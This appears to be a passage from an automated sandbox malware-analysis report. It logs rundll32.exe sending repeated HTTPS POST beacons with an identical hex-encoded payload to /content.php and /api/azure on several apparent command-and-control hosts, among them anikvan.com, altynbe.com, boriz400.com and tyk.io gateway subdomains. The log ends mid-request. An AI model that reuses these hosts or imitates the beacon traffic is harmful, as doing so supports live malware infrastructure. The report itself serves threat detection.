                                                                                                                    2024-05-10 22:04:20 UTC444OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 31 39 65 66 62 38 36 37 39 61 62 33 30 61 35 34 33 39 32 31 35 39 66 31 62 61 65 66 31 31 30 61 32 61 34 63 61 30 66 63 63 61 61 63 63 31 62 62 66 64 64 33 35 36 63 37 66 64 30 32 37 61 34 63 66 62 62 34 66 61 36 34 35 37 30 65 33 32 66 39 35 65 32 39 63 32 31 30 64 35 32 32 62 36 33 34 39 35 36 62 34 63 33 34 35 63 65 31 39 30 35
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203919efb8679ab30a54392159f1baef110a2a4ca0fccaacc1bbfdd356c7fd027a4cfbb4fa64570e32f95e29c210d522b634956b4c345ce1905
                                                                                                                    2024-05-10 22:04:20 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:04:20 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.44975595.164.68.734437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:26 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: anikvan.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:26 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:26 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:04:26 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.44975654.175.181.1044437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:29 UTC286OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:29 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:29 UTC206INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 May 2024 22:04:29 GMT
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 9
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains
                                                                                                                    2024-05-10 22:04:29 UTC9INData Raw: 4e 6f 74 20 46 6f 75 6e 64
                                                                                                                    Data Ascii: Not Found


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449757138.124.183.2154437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:31 UTC245OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: altynbe.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:31 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:32 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:04:32 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.4497583.69.236.354437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:35 UTC279OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:35 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:36 UTC253INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 May 2024 22:04:36 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    X-Ratelimit-Limit: 0
                                                                                                                    X-Ratelimit-Remaining: 0
                                                                                                                    X-Ratelimit-Reset: 0
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.44975995.164.68.734437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:42 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: anikvan.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:42 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:42 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:04:42 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.4497603.69.236.354437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:47 UTC279OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:47 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:48 UTC253INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 May 2024 22:04:48 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    X-Ratelimit-Limit: 0
                                                                                                                    X-Ratelimit-Remaining: 0
                                                                                                                    X-Ratelimit-Reset: 0
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.4497613.69.236.354437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:50 UTC279OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:50 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:50 UTC253INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 May 2024 22:04:50 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    X-Ratelimit-Limit: 0
                                                                                                                    X-Ratelimit-Remaining: 0
                                                                                                                    X-Ratelimit-Reset: 0
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.44976254.175.181.1044437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:54 UTC286OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:54 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:54 UTC206INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 May 2024 22:04:54 GMT
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 9
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains
                                                                                                                    2024-05-10 22:04:54 UTC9INData Raw: 4e 6f 74 20 46 6f 75 6e 64
                                                                                                                    Data Ascii: Not Found


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.44976495.164.68.734437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:00 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: anikvan.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:00 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:00 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:00 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.4497653.69.236.354437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:03 UTC281OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:03 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:03 UTC206INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 May 2024 22:05:03 GMT
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 9
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains
                                                                                                                    2024-05-10 22:05:03 UTC9INData Raw: 4e 6f 74 20 46 6f 75 6e 64
                                                                                                                    Data Ascii: Not Found


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.44976691.194.11.1834437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:09 UTC248OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: boriz400.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:09 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:10 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:09 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.4497673.69.236.354437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:11 UTC279OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:11 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:12 UTC253INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 May 2024 22:05:11 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    X-Ratelimit-Limit: 0
                                                                                                                    X-Ratelimit-Remaining: 0
                                                                                                                    X-Ratelimit-Reset: 0
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.44976895.164.68.734437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:13 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: anikvan.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:13 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:13 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:13 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.4497693.69.236.354437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:14 UTC279OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:14 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:14 UTC253INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 May 2024 22:05:14 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    X-Ratelimit-Limit: 0
                                                                                                                    X-Ratelimit-Remaining: 0
                                                                                                                    X-Ratelimit-Reset: 0
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.449770138.124.183.2154437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:15 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: altynbe.com
                                                                                                                    Content-Length: 154
